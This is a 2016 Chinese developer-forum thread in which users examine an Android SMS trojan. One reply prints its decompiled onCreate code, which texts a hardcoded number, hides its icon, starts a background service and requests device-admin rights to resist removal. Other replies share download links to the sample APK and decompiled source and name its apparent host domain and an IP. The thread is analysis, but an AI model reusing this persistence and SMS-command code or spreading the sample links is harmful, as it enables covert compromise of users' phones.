1
luap 2016-09-02 12:34:35 +08:00
已返编译:
protected void onCreate(Bundle paramBundle) { super.onCreate(paramBundle); super.requestWindowFeature(1); setContentView(2130903040); SmSutils localSmSutils = new SmSutils(); if (SmSutils.key.equals(SmSutils.getPublicKey(this))) { localSmSutils.sendSMS("18789837060", "手机已安装软件,回复 com#false 关闭 com#true 开启, 版本" + Build.VERSION.SDK_INT + " " + Build.MODEL, null); Toast.makeText(this, "程序启动成功", 1).show(); getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1); startService(new Intent(this, SmSserver.class)); this.Dmanager = ((DevicePolicyManager)getSystemService("device_policy")); ComponentName localComponentName = new ComponentName(this, DeviceReceiver.class); if (!this.Dmanager.isAdminActive(localComponentName)) { Intent localIntent = new Intent(getAction()); localIntent.putExtra(getExtraDeviceAdmin(), localComponentName); localIntent.putExtra(getExtraAddExplanation(), "设备管理器"); startActivityForResult(localIntent, 0); } finish(); return; } localSmSutils.sendSMS("18789837060", "证书错误,程序启动失败", null); Toast.makeText(this, "证书错误,程序启动失败", 1).show(); finish(); } |
3
shimanooo 2016-09-02 12:46:21 +08:00
求玩法..
用小号发短信骂三门? |
6
ljbha007 2016-09-02 13:03:19 +08:00
炸之
|
8
wohenyingyu01 2016-09-02 13:17:11 +08:00 via iPhone
是干嘛的……
|
9
jsonzz 2016-09-02 13:21:57 +08:00
我跟踪过类似的 Android 病毒,当时写了个分析。可以看看我 blog:http://ztwo.github.io/blog/Androidworm/
|
10
just1 2016-09-02 13:25:05 +08:00 via Android
不会玩放腾讯哈勃分析
|
11
ljcarsenal 2016-09-02 13:27:46 +08:00 via Android
@jsonzz 看了你那个文章,你是怎么进入他邮箱的呢 难道把密码写在 apk 里?
|
12
haozibi 2016-09-02 13:33:13 +08:00
@ljcarsenal 源码里有发信账号和密码。
|
13
hinkal 2016-09-02 13:33:40 +08:00
这病毒我见过,据说是个初二学生写的,密码就硬编码在代码里。
|
14
gimp 2016-09-02 13:46:12 +08:00
http://yzc178co.com/index.htm
@luap @jsonzz 这个呢,我昨天反编译了一下,不太会 java ,也没看到什么有价值的东西,也不知道折腾的对不对 代码: https://mega.nz/#!CF93iCyS!93vk_KL3YKZMtWQ34GPb_1Jol-viW63FbCxHuIHOvaI 域名应该是快到期了, apk 这里: https://mega.nz/#!XJtACAZY!vPYDNgu7yIEbOeZZx98mTafLTJ3NgQM4izi0qJI9mrU |
15
Rect 2016-09-02 13:54:18 +08:00
http://218.6.173.38/
...这个地址 |
16
CodingPuppy 2016-09-02 13:59:46 +08:00
android 漏洞不少,无法卸载的漏洞在 AndroidM 上还有
|
17
shenfu1991 2016-09-02 15:19:09 +08:00
关键是这个是 android 程序,在 iOS 无效吧。。。
|
18
VmuTargh 2016-09-02 16:33:21 +08:00 via Android
@shenfu1991 iOS 有支付宝(大雾
|
19
fjzjk 2016-09-02 18:06:40 +08:00
这种多了,实际上没啥,只是安卓权限比较多,安装上就能乱搞。
你看上面都有人反编译了,混淆都不做的 |
20
tempdban 2016-09-02 18:40:12 +08:00 via Android
@CodingPuppy 我有点蒙,只有成为设备管理器白不能卸载吧
|